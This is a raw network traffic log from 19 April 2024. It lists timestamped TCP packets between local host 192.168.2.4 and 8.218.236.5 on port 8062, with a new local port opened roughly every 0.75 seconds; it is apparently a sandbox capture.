Apr 19, 2024 09:53:28.096482038 CEST	50002	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:28.292259932 CEST	8062	50001	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:28.418076038 CEST	8062	50002	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:28.418195009 CEST	50002	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:28.418477058 CEST	50002	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:28.739929914 CEST	8062	50002	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:28.742216110 CEST	8062	50002	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:28.742254019 CEST	8062	50002	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:28.742290020 CEST	50002	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:28.742326975 CEST	50002	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:28.742413998 CEST	50002	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:28.846417904 CEST	50003	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:29.063999891 CEST	8062	50002	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:29.165188074 CEST	8062	50003	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:29.165282011 CEST	50003	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:29.165512085 CEST	50003	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:29.484230995 CEST	8062	50003	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:29.486670971 CEST	8062	50003	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:29.486728907 CEST	8062	50003	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:29.486763954 CEST	50003	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:29.486848116 CEST	50003	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:29.492455006 CEST	50003	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:29.597938061 CEST	50004	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:29.811223984 CEST	8062	50003	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:29.923141956 CEST	8062	50004	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:29.928916931 CEST	50004	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:29.937937021 CEST	50004	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:30.263067961 CEST	8062	50004	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:30.265085936 CEST	8062	50004	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:30.265125990 CEST	8062	50004	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:30.265161991 CEST	50004	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:30.265237093 CEST	50004	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:30.265621901 CEST	50004	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:30.378468037 CEST	50005	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:30.590922117 CEST	8062	50004	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:30.691756964 CEST	8062	50005	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:30.691833973 CEST	50005	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:30.692105055 CEST	50005	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:31.005214930 CEST	8062	50005	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:31.007297993 CEST	8062	50005	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:31.007337093 CEST	8062	50005	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:31.007355928 CEST	50005	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:31.007431030 CEST	50005	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:31.007513046 CEST	50005	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:31.111556053 CEST	50006	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:31.320847988 CEST	8062	50005	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:31.426625967 CEST	8062	50006	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:31.426712990 CEST	50006	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:31.426924944 CEST	50006	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:31.741957903 CEST	8062	50006	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:31.743675947 CEST	8062	50006	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:31.743719101 CEST	8062	50006	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:31.743769884 CEST	50006	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:31.743859053 CEST	50006	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:31.744400978 CEST	50006	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:31.861296892 CEST	50007	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:32.059128046 CEST	8062	50006	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:32.174711943 CEST	8062	50007	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:32.175214052 CEST	50007	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:32.175374985 CEST	50007	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:32.488830090 CEST	8062	50007	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:32.490583897 CEST	8062	50007	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:32.490633011 CEST	8062	50007	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:32.491178036 CEST	50007	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:32.491576910 CEST	50007	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:32.595226049 CEST	50008	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:32.804816961 CEST	8062	50007	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:32.907819033 CEST	8062	50008	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:32.908019066 CEST	50008	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:32.908144951 CEST	50008	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:33.220419884 CEST	8062	50008	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:33.222275019 CEST	8062	50008	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:33.222301006 CEST	8062	50008	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:33.222423077 CEST	50008	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:33.222584009 CEST	50008	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:33.332528114 CEST	50009	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:33.534987926 CEST	8062	50008	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:33.656579018 CEST	8062	50009	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:33.656678915 CEST	50009	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:33.656843901 CEST	50009	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:33.981283903 CEST	8062	50009	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:33.986576080 CEST	8062	50009	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:33.986618042 CEST	8062	50009	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:33.986671925 CEST	50009	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:33.987692118 CEST	50009	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:34.095398903 CEST	50009	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:34.098378897 CEST	50010	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:34.418581963 CEST	8062	50010	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:34.419642925 CEST	8062	50009	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:34.419919014 CEST	50010	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:34.420092106 CEST	50010	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:34.740197897 CEST	8062	50010	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:34.742708921 CEST	8062	50010	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:34.742748022 CEST	8062	50010	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:34.742775917 CEST	50010	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:34.742810011 CEST	50010	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:34.742958069 CEST	50010	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:34.863255978 CEST	50011	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:35.063294888 CEST	8062	50010	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:35.174066067 CEST	8062	50011	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:35.174159050 CEST	50011	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:35.174315929 CEST	50011	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:35.485239983 CEST	8062	50011	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:35.487217903 CEST	8062	50011	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:35.487260103 CEST	8062	50011	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:35.487276077 CEST	50011	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:35.487339973 CEST	50011	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:35.487813950 CEST	50011	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:35.596043110 CEST	50012	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:35.798542976 CEST	8062	50011	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:35.911562920 CEST	8062	50012	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:35.914552927 CEST	50012	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:35.914748907 CEST	50012	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:36.230344057 CEST	8062	50012	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:36.232033014 CEST	8062	50012	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:36.232070923 CEST	8062	50012	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:36.232198000 CEST	50012	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:36.232268095 CEST	50012	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:36.345228910 CEST	50013	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:36.547792912 CEST	8062	50012	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:36.684695959 CEST	8062	50013	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:36.686515093 CEST	50013	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:36.686815023 CEST	50013	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:37.026209116 CEST	8062	50013	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:37.028213024 CEST	8062	50013	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:37.028250933 CEST	8062	50013	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:37.028275967 CEST	50013	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:37.028346062 CEST	50013	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:37.028368950 CEST	50013	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:37.148008108 CEST	50014	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:37.367729902 CEST	8062	50013	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:37.472433090 CEST	8062	50014	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:37.472502947 CEST	50014	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:37.473169088 CEST	50014	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:37.797267914 CEST	8062	50014	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:37.799137115 CEST	8062	50014	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:37.799179077 CEST	8062	50014	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:37.799336910 CEST	50014	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:37.799336910 CEST	50014	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:37.907643080 CEST	50015	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:38.123692036 CEST	8062	50014	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:38.227545977 CEST	8062	50015	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:38.227658033 CEST	50015	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:38.227993965 CEST	50015	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:38.547813892 CEST	8062	50015	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:38.549602032 CEST	8062	50015	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:38.549643040 CEST	8062	50015	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:38.549695015 CEST	50015	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:38.552581072 CEST	50015	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:38.657582998 CEST	50015	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:38.657582998 CEST	50016	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:38.977525949 CEST	8062	50015	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:38.986437082 CEST	8062	50016	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:38.986505985 CEST	50016	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:38.986730099 CEST	50016	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:39.315617085 CEST	8062	50016	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:39.317820072 CEST	8062	50016	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:39.317869902 CEST	50016	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:39.317874908 CEST	8062	50016	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:39.317914009 CEST	50016	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:39.318011999 CEST	50016	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:39.424598932 CEST	50017	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:39.646531105 CEST	8062	50016	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:39.749103069 CEST	8062	50017	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:39.752973080 CEST	50017	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:39.752973080 CEST	50017	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:40.077630997 CEST	8062	50017	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:40.079468966 CEST	8062	50017	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:40.079509020 CEST	8062	50017	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:40.079655886 CEST	50017	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:40.079803944 CEST	50017	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:40.188915968 CEST	50018	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:40.404133081 CEST	8062	50017	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:40.506794930 CEST	8062	50018	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:40.508595943 CEST	50018	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:40.508969069 CEST	50018	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:40.826659918 CEST	8062	50018	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:40.828886986 CEST	8062	50018	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:40.828928947 CEST	8062	50018	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:40.828948021 CEST	50018	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:40.829025030 CEST	50018	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:40.829047918 CEST	50018	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:40.940079927 CEST	50019	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:41.146744013 CEST	8062	50018	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:41.256134987 CEST	8062	50019	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:41.256220102 CEST	50019	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:41.256436110 CEST	50019	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:41.572463989 CEST	8062	50019	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:41.574795961 CEST	8062	50019	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:41.574856997 CEST	8062	50019	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:41.574877024 CEST	50019	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:41.574901104 CEST	50019	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:41.574976921 CEST	50019	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:41.688888073 CEST	50020	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:41.891118050 CEST	8062	50019	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:42.015419960 CEST	8062	50020	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:42.015659094 CEST	50020	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:42.015873909 CEST	50020	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:42.342145920 CEST	8062	50020	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:42.344683886 CEST	8062	50020	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:42.344739914 CEST	8062	50020	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:42.344885111 CEST	50020	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:42.344993114 CEST	50020	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:42.454330921 CEST	50021	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:42.454437017 CEST	50020	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:42.764909029 CEST	8062	50021	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:42.765006065 CEST	50021	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:42.765213013 CEST	50021	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:42.780738115 CEST	8062	50020	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:43.075772047 CEST	8062	50021	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:43.077380896 CEST	8062	50021	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:43.077438116 CEST	8062	50021	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:43.077480078 CEST	50021	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:43.077538967 CEST	50021	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:43.077560902 CEST	50021	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:43.190319061 CEST	50022	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:43.388302088 CEST	8062	50021	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:43.508691072 CEST	8062	50022	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:43.508919954 CEST	50022	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:43.509057999 CEST	50022	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:43.826984882 CEST	8062	50022	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:43.828865051 CEST	8062	50022	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:43.828907013 CEST	8062	50022	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:43.829083920 CEST	50022	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:43.832381964 CEST	50022	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:43.940155029 CEST	50023	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:44.150264978 CEST	8062	50022	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:44.261805058 CEST	8062	50023	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:44.264723063 CEST	50023	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:44.264870882 CEST	50023	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:44.586508989 CEST	8062	50023	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:44.588299990 CEST	8062	50023	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:44.588341951 CEST	8062	50023	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:44.588396072 CEST	50023	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:44.588476896 CEST	50023	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:44.588586092 CEST	50023	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:44.704705000 CEST	50024	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:44.910173893 CEST	8062	50023	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:45.019280910 CEST	8062	50024	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:45.019376040 CEST	50024	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:45.019716024 CEST	50024	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:45.334212065 CEST	8062	50024	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:45.336070061 CEST	8062	50024	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:45.336138964 CEST	50024	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:45.336144924 CEST	8062	50024	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:45.336199999 CEST	50024	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:45.336280107 CEST	50024	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:45.438766003 CEST	50025	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:45.650652885 CEST	8062	50024	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:45.754575968 CEST	8062	50025	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:45.756920099 CEST	50025	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:45.757251978 CEST	50025	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:46.073174953 CEST	8062	50025	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:46.074914932 CEST	8062	50025	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:46.074958086 CEST	8062	50025	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:46.075009108 CEST	50025	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:46.075095892 CEST	50025	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:46.077574015 CEST	50025	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:46.189515114 CEST	50026	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:46.393368959 CEST	8062	50025	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:46.528743982 CEST	8062	50026	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:46.532522917 CEST	50026	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:46.532810926 CEST	50026	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:46.871989012 CEST	8062	50026	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:46.873928070 CEST	8062	50026	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:46.873966932 CEST	8062	50026	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:46.873986006 CEST	50026	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:46.874008894 CEST	50026	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:46.874176979 CEST	50026	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:46.995179892 CEST	50027	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:47.213385105 CEST	8062	50026	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:47.327812910 CEST	8062	50027	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:47.327910900 CEST	50027	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:47.329307079 CEST	50027	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:47.661926985 CEST	8062	50027	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:47.664074898 CEST	8062	50027	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:47.664155006 CEST	8062	50027	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:47.664163113 CEST	50027	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:47.664208889 CEST	50027	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:47.664333105 CEST	50027	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:47.770406961 CEST	50028	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:47.997042894 CEST	8062	50027	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:48.083432913 CEST	8062	50028	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:48.083698988 CEST	50028	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:48.083897114 CEST	50028	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:48.396903992 CEST	8062	50028	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:48.399338961 CEST	8062	50028	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:48.399354935 CEST	8062	50028	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:48.399791002 CEST	50028	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:48.399878025 CEST	50028	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:48.517132998 CEST	50029	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:48.713352919 CEST	8062	50028	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:48.840873003 CEST	8062	50029	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:48.841015100 CEST	50029	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:48.841203928 CEST	50029	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:49.164961100 CEST	8062	50029	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:49.166935921 CEST	8062	50029	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:49.166976929 CEST	8062	50029	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:49.167025089 CEST	50029	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:49.167026043 CEST	50029	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:49.167113066 CEST	50029	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:49.283658981 CEST	50030	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:49.490844011 CEST	8062	50029	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:49.599421978 CEST	8062	50030	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:49.599663019 CEST	50030	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:49.599754095 CEST	50030	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:49.915613890 CEST	8062	50030	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:49.917567968 CEST	8062	50030	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:49.917609930 CEST	8062	50030	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:49.917941093 CEST	50030	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:49.920696020 CEST	50030	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:50.034044981 CEST	50031	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:50.236561060 CEST	8062	50030	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:50.350150108 CEST	8062	50031	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:50.352494955 CEST	50031	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:50.352741957 CEST	50031	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:50.668598890 CEST	8062	50031	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:50.670445919 CEST	8062	50031	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:50.670488119 CEST	8062	50031	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:50.670515060 CEST	50031	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:50.670552015 CEST	50031	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:50.670655966 CEST	50031	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:50.783766031 CEST	50032	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:50.986495972 CEST	8062	50031	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:51.098371983 CEST	8062	50032	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:51.098479986 CEST	50032	8062	192.168.2.4	8.218.236.5
